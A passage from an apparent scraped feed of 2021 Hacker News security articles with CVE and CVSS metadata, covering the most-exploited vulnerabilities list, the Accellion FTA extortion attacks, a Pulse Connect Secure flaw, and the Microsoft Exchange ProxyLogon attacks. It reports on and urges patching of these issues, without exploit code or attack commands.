Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\n[](<https://go.thn.li/1-free-728-8> \"Stack Overflow Teams\" )\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core &amp; Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\n[](<https://go.thn.li/ransomware_300> \"Prevent Ransomware Attacks\" )\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-23T08:28:36", "description": "[](<https://thehackernews.com/images/-o4PjWjTeBCk/YDSsM4Y2pnI/AAAAAAAAB3A/s_vIwO-nBdgTSgGdEET9fFhVzK0QVUeuwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nCybersecurity researchers on Monday tied a [string of attacks](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called **UNC2546**.\n\nThe attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.\n\nBut in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nAccording to [Risky Business](<https://risky.biz/newsletter44/>), some of the companies that have had their data listed on the site include Singapore's telecom provider [SingTel](<https://www.singtel.com/personal/support/about-accellion-security-incident>), the American Bureau of Shipping, law firm [Jones Day](<https://www.wsj.com/articles/hacker-claims-to-have-stolen-files-belonging-to-prominent-law-firm-jones-day-11613514532>), the Netherlands-based [Fugro](<https://www.fugro.com/media-centre/news/fulldetails/2021/02/12/cyber-security-incident-third-party-supplier-of-fugro>), and life sciences company Danaher.\n\n[](<https://thehackernews.com/images/-Q8lPq3Q_3Ak/YDSqVE_QgnI/AAAAAAAAB24/rXciWGBxiEoUYoFwkxwNK4iI-SawG1jkACLcBGAsYHQ/s0/data-theft.jpg>)\n\nFollowing the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -\n\n * CVE-2021-27101 - SQL injection via a crafted Host header\n * CVE-2021-27102 - OS command execution via a local web service call\n * CVE-2021-27103 - SSRF via a crafted POST request\n * CVE-2021-27104 - OS command execution via a crafted POST request\n\nFireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is [tracking](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>) the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite \"compelling\" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.\n\n\"Many of the organizations compromised by UNC2546 were previously targeted by FIN11,\" FireEye said. \"Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020.\"\n\nOnce installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the \"CLOP ransomware team\" several weeks later.\n\nLack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.\n\nBesides urging its FTA customers to migrate to kiteworks, Accellion [said](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/>) fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered \"significant\" data theft.\n\nThe development comes after grocery chain Kroger [disclosed](<https://www.kroger.com/i/accellion-incident>) last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.\n\nThen earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach.\n\n\"The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,\" the Australian agency [said](<https://www.transport.nsw.gov.au/news-and-events/articles/transport-for-nsw-impacted-by-worldwide-accellion-data-breach>). \"Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-02-23T07:18:00", "type": "thn", "title": "Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-23T08:26:03", "id": "THN:43A16BBDCD3B020E360EE37C48B44088", "href": "https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-25T08:29:10", "description": "[](<https://thehackernews.com/images/-BCVwauxz7O8/YKyosjaDKmI/AAAAAAAACn4/TLH1Bsw4NgwXyHFB5EmU57Aro4WWNwQegCLcBGAsYHQ/s0/pulse-secure-vpn-vulnerability.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges.\n\n\"Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\" the company [said](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) in an alert published on May 14. \"As of version 9.1R3, this permission is not enabled by default.\"\n\nThe flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.\n\n[](<https://go.thn.li/1-300-5> \"password auditor\" )\n\n\"When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\" CERT/CC [detailed](<https://kb.cert.org/vuls/id/667933>) in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.'\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability.\n\nIt bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named '[Workaround-2104.xml,](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY>)' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.'\n\n[](<https://thehackernews.com/images/-2uTEZxdSTZw/YKypBTo6Q-I/AAAAAAAACoE/B0oJ9iYqOKkxyiyr2rn0S1KzYo5qu3QvgCLcBGAsYHQ/s0/pulse.jpg>)\n\nWhile Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. \n\n\"The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,\" it noted.\n\n\"An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy.\"\n\nThe disclosure of a new flaw arrives weeks after the Utah-based IT software company [patched](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>) multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively [exploited in the wild](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) by at least two different threat actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-05-25T07:37:00", "type": "thn", "title": "New High-Severity Vulnerability Reported in Pulse Connect Secure VPN", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22908"], "modified": "2021-05-25T07:37:19", "id": "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "href": "https://thehackernews.com/2021/05/new-high-severity-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-08T08:28:09", "description": "[](<https://thehackernews.com/images/-9-w9YkXtT5w/YECrmqxcKZI/AAAAAAAAB8c/y1lgP3oxO-sd2Br7Oak7lJXAAcf7EG2XwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nEnterprise cloud security firm **Qualys** has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.\n\nAs proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.\n\nConfirming the incident, Qualys Chief Information Security Officer Ben Carr [said](<https://blog.qualys.com/vulnerabilities-research/2021/03/03/qualys-update-on-accellion-fta-security-incident>) a detailed probe \"identified unauthorized access to files hosted on the Accellion FTA server\" located in a DMZ (aka [demilitarized zone](<https://en.wikipedia.org/wiki/DMZ_%28computing%29>)) environment that's segregated from the rest of the internal network.\n\n\"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access,\" Carr added. \"The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform.\"\n\nLast month, FireEye's Mandiant threat intelligence team [disclosed](<https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html>) details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.\n\n[](<https://thehackernews.com/images/-N0_0EMgMeSk/YECsZm15i_I/AAAAAAAAB8o/LpcUVTcjzyw22UE7TTrWXNzJGVpnzURugCLcBGAsYHQ/s0/data.jpg>)\n\nWhile two of the flaws (CVE-2021-27101 and CVE-2021-27104) were [addressed](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified earlier this year and fixed on January 25.\n\nQualys said it received an \"integrity alert\" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.\n\n\"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,\" Mandiant [said](<https://www.accellion.com/company/security-updates/mandiant-issues-final-report-regarding-accellion-fta-attack/>) in a security assessment of the FTA software published earlier this week.\n\nAdditionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 \u2014\n\n * **CVE-2021-27730**: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and\n * **CVE-2021-27731**: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users\n\nThe FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-03-04T09:49:00", "type": "thn", "title": "Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27730", "CVE-2021-27731"], "modified": "2021-03-08T07:30:27", "id": "THN:582576397E2C98200C7C952401392B5B", "href": "https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-03T08:40:21", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-10T10:35:45", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help 